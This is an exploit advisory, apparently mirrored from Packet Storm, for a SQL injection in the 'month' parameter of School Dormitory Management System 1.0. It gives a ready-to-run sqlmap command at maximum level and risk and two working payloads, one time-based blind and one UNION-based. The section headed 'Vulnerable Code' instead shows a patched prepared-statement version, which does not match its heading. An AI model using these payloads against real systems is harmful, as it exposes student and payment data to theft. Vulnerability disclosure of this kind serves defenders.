## https://sploitus.com/exploit?id=PACKETSTORM:167001
# Exploit Title: School Dormitory Management System - 'month' SQL Injection  
# Date: 08/05/2022  
# Exploit Author: Saud Alenazi  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html  
# Version: 1.0  
# Tested on: XAMPP, Linux  
  
  
  
# Vulnerable Code  
  
Line 59 of `/dms/admin/reports/daily_collection_report.php` interpolates the `month` request parameter straight into the SQL string, so a single quote in the value breaks out of the literal and the rest of the query is attacker-controlled:
  
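// Remediated form of the vulnerable line: `$month` is bound as a query
// parameter instead of being interpolated into the SQL text, so a value like
// `1' UNION ...` is compared literally against p.month_of and can no longer
// change the statement.
// NOTE(review): assumes $conn is a mysqli connection, as the original
// `$conn->query()` call suggests; with PDO the equivalent is
// `$stmt = $conn->prepare($sql); $stmt->execute([$month]); $qry = $stmt;`.
$sql = "SELECT p.*, a.code, s.code as student_code, concat(s.firstname, ' ', coalesce(concat(s.middlename,' '), ''), s.lastname) as `student`, d.name as dorm, r.name as `room` from payment_list p inner join account_list a on p.account_id = a.id inner join student_list s on a.student_id = s.id inner join room_list r on a.room_id = r.id inner join dorm_list d on r.dorm_id = d.id where (p.month_of) = ? order by student asc";
$stmt = $conn->prepare($sql);
if ($stmt === false) {
    // Fail loudly rather than continuing with $qry === false and a confusing
    // error further down in the report rendering.
    throw new RuntimeException('Failed to prepare daily collection report query: ' . $conn->error);
}
// 's' binds the value as a string; the driver handles quoting, so no escaping
// of $month is needed here.
$stmt->bind_param('s', $month);
$stmt->execute();
// get_result() yields a mysqli_result, the same type $conn->query() returned,
// so the row loop that consumes $qry below does not need to change.
$qry = $stmt->get_result();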
  
# Sqlmap command:  
  
sqlmap -u "http://localhost/dms/admin/?month=1&page=reports/daily_collection_report" -p month --level=5 --risk=3 --dbs --random-agent --eta  
  
# Output:  
  
Parameter: month (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: month=1' AND (SELECT 3271 FROM (SELECT(SLEEP(5)))duQT) AND 'NgBP'='NgBP&page=reports/daily_collection_report  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 11 columns  
Payload: month=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626b6a71,0x485362486f7266597a444d417754744873427366706c4a4f706b7949467a6a61505468424c476753,0x716b6a7171),NULL,NULL,NULL,NULL-- -&page=reports/daily_collection_report